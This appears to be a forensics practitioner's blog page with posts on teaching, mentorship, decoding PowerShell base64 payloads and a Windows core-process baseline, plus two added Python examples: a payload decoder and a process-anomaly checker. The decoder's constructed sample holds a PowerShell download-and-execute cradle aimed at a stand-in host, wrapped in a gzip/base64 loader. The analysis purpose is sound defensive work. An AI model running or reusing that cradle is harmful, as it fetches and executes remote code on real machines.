praktisi mengajar and Deall mentoring program
So I got two interesting opportunities in 2022: praktisi mengajar, to talk about network forensics, and Deall Mentorship. Here's how those things went:
DFIR & random stuff
My writing on a use case of MITRE that I sent to cdef.id for their (supposedly) quarterly bulletin. This would be the second time cdef published my writing (check out the first one over here).
I was doing some 'weird jobs' and needed to know what was really happening with this PowerShell base64 payload. The payload itself is nothing new, but I'll post it here in case someone needs it, since these resources were pretty hard to find when I needed them.
So here are some of those PowerShell payloads.
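The decoding step behind that post, as an added Python example (not the post's own payload or script): `powershell -EncodedCommand` carries base64 of UTF-16LE text, which is why a naive base64 decode shows a NUL after every character, and droppers commonly wrap the real script as a second `FromBase64String('...')` stage pushed through a GzipStream or DeflateStream. The sample payload below is constructed here; the inner-stage regex and the UTF-8/UTF-16LE guess for nested stages are assumptions of this example.

```python
import base64
import gzip
import re
import zlib


def encode_powershell_command(script: str) -> str:
    """Mirror what `powershell -EncodedCommand` expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand blob back to script text.

    The interleaved NUL bytes seen in a plain base64 decode are the
    UTF-16LE encoding, not an extra obfuscation layer.
    """
    raw = base64.b64decode(blob)
    return raw.decode("utf-16le", errors="replace").lstrip("\ufeff")


# Second stage: the real script is often carried as FromBase64String('...')
# and fed to a GzipStream/DeflateStream (pattern assumed, not from the post).
INNER_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def inflate_any(data: bytes) -> bytes:
    """Undo gzip or raw DEFLATE; return the data untouched if it is neither."""
    if data[:2] == b"\x1f\x8b":  # gzip magic
        return gzip.decompress(data)
    try:
        return zlib.decompress(data, -15)  # raw DEFLATE, what DeflateStream writes
    except zlib.error:
        return data


def bytes_to_script(data: bytes) -> str:
    # Heuristic (assumed): a NUL in the second byte means UTF-16LE text.
    if len(data) >= 2 and data[1] == 0:
        return data.decode("utf-16le", errors="replace")
    return data.decode("utf-8", errors="replace")


def unwrap_stages(blob: str, max_depth: int = 5) -> list[str]:
    """Return every stage: the -enc script first, then each nested base64 stage."""
    script = decode_encoded_command(blob)
    stages = [script]
    for _ in range(max_depth):
        m = INNER_B64.search(script)
        if not m:
            break
        script = bytes_to_script(inflate_any(base64.b64decode(m.group(1))))
        stages.append(script)
    return stages


# Constructed sample payload (not a real capture): a gzip+base64 inner stage
# wrapped in a loader, then the loader encoded the way -enc wants it.
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_inner_b64 = base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
LOADER = (
    "$d=[Convert]::FromBase64String('" + _inner_b64 + "');"
    "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
    "(New-Object IO.MemoryStream(,$d)),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
)
SAMPLE_ENCODED = encode_powershell_command(LOADER)

if __name__ == "__main__":
    for i, stage in enumerate(unwrap_stages(SAMPLE_ENCODED)):
        print(f"--- stage {i} ---\n{stage}\n")
```

Run it on a real blob by replacing `SAMPLE_ENCODED` with the string after `-enc`/`-EncodedCommand` from the process command line; `max_depth` bounds how many nested stages are followed so a self-referencing payload cannot loop forever.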
Even with the awesome lists all over GitHub, I kept losing track of cool tools, so here are some of them:
(last update 11.09.2022)
In the spirit of keeping the resources updated, I'm moving this post to aldosimon/dfir.
During incident response, we sometimes need to know the characteristics of a running process in order to decide whether it is malicious or not. Below are several Windows core processes, each with a short description and its characteristics, to serve as a baseline so that during incident response it is easier to filter malicious processes from benign ones.
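One way to turn such a baseline into a check, as an added Python example rather than the post's own table: for a handful of core processes, compare each running instance's parent image, image directory, account and instance count against the expected values, and flag names that merely resemble a core process. The baseline values are the commonly documented defaults and are an assumption of this example, as is the lookalike threshold; the process list is constructed here.

```python
from collections import Counter
from dataclasses import dataclass
from difflib import SequenceMatcher


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str   # image name as the process list shows it
    path: str   # full image path on disk
    user: str   # account the process runs as


SYSTEM = "nt authority\\system"
SVC_ACCOUNTS = {SYSTEM, "nt authority\\local service", "nt authority\\network service"}
SYS32 = "c:\\windows\\system32"
EXITED = "EXITED"  # parent is normally gone already (smss/userinit spawn, then exit)

# Baseline per core process: allowed parent image names, expected directory,
# allowed accounts (None = any logged-on user), whether several instances are normal.
# Values are the commonly documented defaults and an assumption of this example.
BASELINE = {
    "smss.exe":      (("system",), SYS32, {SYSTEM}, False),
    "csrss.exe":     (("smss.exe", EXITED), SYS32, {SYSTEM}, True),
    "wininit.exe":   (("smss.exe", EXITED), SYS32, {SYSTEM}, False),
    "winlogon.exe":  (("smss.exe", EXITED), SYS32, {SYSTEM}, True),
    "services.exe":  (("wininit.exe",), SYS32, {SYSTEM}, False),
    "lsass.exe":     (("wininit.exe",), SYS32, {SYSTEM}, False),
    "svchost.exe":   (("services.exe",), SYS32, SVC_ACCOUNTS, True),
    "taskhostw.exe": (("svchost.exe",), SYS32, None, True),
    "explorer.exe":  (("userinit.exe", EXITED), "c:\\windows", None, True),
}
LOOKALIKE_RATIO = 0.85  # assumed threshold for typosquatted names


def check_baseline(procs):
    """Return (pid, reason) for every deviation from BASELINE."""
    by_pid = {p.pid: p for p in procs}
    counts = Counter(p.name.lower() for p in procs)
    findings = []
    for p in procs:
        name = p.name.lower()
        if name == "system":
            continue  # kernel process, root of the tree
        rule = BASELINE.get(name)
        if rule is None:
            # Not a core process: is it masquerading as one (scvhost.exe, lsasss.exe ...)?
            for core in BASELINE:
                if SequenceMatcher(None, name, core).ratio() >= LOOKALIKE_RATIO:
                    findings.append((p.pid, f"{p.name} resembles core process {core}"))
            continue
        parents, directory, users, multi_ok = rule
        parent = by_pid.get(p.ppid)
        if parent is None:
            if EXITED not in parents:
                findings.append((p.pid, f"{name}: parent pid {p.ppid} not running"))
        elif parent.name.lower() not in parents:
            findings.append((p.pid, f"{name}: parent is {parent.name}, expected {parents[0]}"))
        if p.path.lower().rsplit("\\", 1)[0] != directory:
            findings.append((p.pid, f"{name}: image at {p.path}, expected {directory}"))
        if users is not None and p.user.lower() not in users:
            findings.append((p.pid, f"{name}: runs as {p.user}"))
        if not multi_ok and counts[name] > 1:
            findings.append((p.pid, f"{name}: {counts[name]} instances, expected one"))
    return findings


# Constructed process list: a normal boot chain plus three planted anomalies.
SAMPLE = [
    Proc(4, 0, "System", "", SYSTEM),
    Proc(368, 4, "smss.exe", "C:\\Windows\\System32\\smss.exe", SYSTEM),
    Proc(480, 360, "csrss.exe", "C:\\Windows\\System32\\csrss.exe", SYSTEM),
    Proc(544, 360, "wininit.exe", "C:\\Windows\\System32\\wininit.exe", SYSTEM),
    Proc(640, 544, "services.exe", "C:\\Windows\\System32\\services.exe", SYSTEM),
    Proc(652, 544, "lsass.exe", "C:\\Windows\\System32\\lsass.exe", SYSTEM),
    Proc(800, 640, "svchost.exe", "C:\\Windows\\System32\\svchost.exe", SYSTEM),
    Proc(1240, 640, "svchost.exe", "C:\\Windows\\System32\\svchost.exe", "NT AUTHORITY\\NETWORK SERVICE"),
    Proc(2800, 2790, "explorer.exe", "C:\\Windows\\explorer.exe", "CORP\\bob"),
    # svchost spawned by explorer, from the user's Temp, as the user
    Proc(4100, 2800, "svchost.exe", "C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe", "CORP\\bob"),
    # second lsass, with services.exe instead of wininit.exe as parent
    Proc(4200, 640, "lsass.exe", "C:\\Windows\\System32\\lsass.exe", SYSTEM),
    # typosquatted name in the right directory
    Proc(4300, 640, "scvhost.exe", "C:\\Windows\\System32\\scvhost.exe", SYSTEM),
]

if __name__ == "__main__":
    for pid, reason in check_baseline(SAMPLE):
        print(f"pid {pid}: {reason}")
```

Note that a duplicate single-instance process flags both copies (the legitimate lsass.exe is listed as well), which is the intended behaviour: the analyst still has to decide which of the two is the real one, usually from parent and path.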